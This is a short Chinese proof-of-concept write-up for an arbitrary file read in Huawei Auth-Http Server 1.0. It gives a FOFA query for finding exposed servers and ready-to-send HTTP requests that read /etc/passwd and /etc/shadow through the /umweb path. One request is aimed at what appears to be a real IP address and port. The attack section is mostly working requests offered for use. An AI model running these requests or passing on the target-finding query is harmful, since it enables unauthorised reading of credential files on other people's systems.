华为Auth-HTTP服务器任意文件读取漏洞

华为Auth-Http Server 1.0存在任意文件读取,攻击者可通过该漏洞读取任意文件。

1.漏洞级别

高危

2.漏洞搜索

fofa

复制代码
server="Huawei Auth-Http Server 1.0"

3.漏洞复现

构造

复制代码
GET /umweb/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

即可成功获取数据
同理,构造

复制代码
GET /umweb/shadow HTTP/1.1
Host: 60.23.25.42:8887
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

这里的umweb路径等价于/etc,后面接文件的地址

复制代码
/umweb/passwd = /etc/passwd
同理还可以访问
/umweb/shadow
/umweb/hosts等敏感文件

注:可惜的是这个漏洞无法跨越目录访问,只能在/etc目录下进行访问,因此利用价值相对有限,无法获得过多的敏感数据,属于是是个鸡肋漏洞了。

相关推荐
蓝之白10 小时前
流量分析_SnakeBackdoor-6
web安全·ctf·流量分析·逆向分析
以太浮标10 小时前
华为eNSP模拟器综合实验之-BFD联动配置解析
运维·网络·华为·信息与通信
小雨青年11 小时前
鸿蒙 HarmonyOS 6 | ArkUI (05):布局进阶 RelativeContainer 相对布局与 Flex 弹性布局
华为·harmonyos
哈__15 小时前
Flutter 开发鸿蒙 PC 第一个应用:窗口创建 + 大屏布局
flutter·华为·harmonyos
白山云北诗16 小时前
企业网站网络安全防护方案
安全·web安全·网络安全·ddos防护·web应用防火墙·cc防护
以太浮标18 小时前
华为eNSP模拟器综合实验之- PPP协议解析及配置案例
运维·网络·华为·信息与通信
2301_7807896618 小时前
服务器感染的病毒有哪些特点呢?
安全·web安全
不爱学英文的码字机器18 小时前
【鸿蒙PC命令行适配】基于OHOS SDK直接构建xz命令集(xz、xzgrep、xzdiff),完善tar.xz解压能力
华为·harmonyos
上海云盾第一敬业销售19 小时前
CC攻击与流量劫持的关系解析
web安全
特立独行的猫a19 小时前
[鸿蒙PC命令行程序移植实战]:交叉编译移植最新openSSL 4.0.0到鸿蒙PC
华为·harmonyos·移植·openssl·交叉编译·鸿蒙pc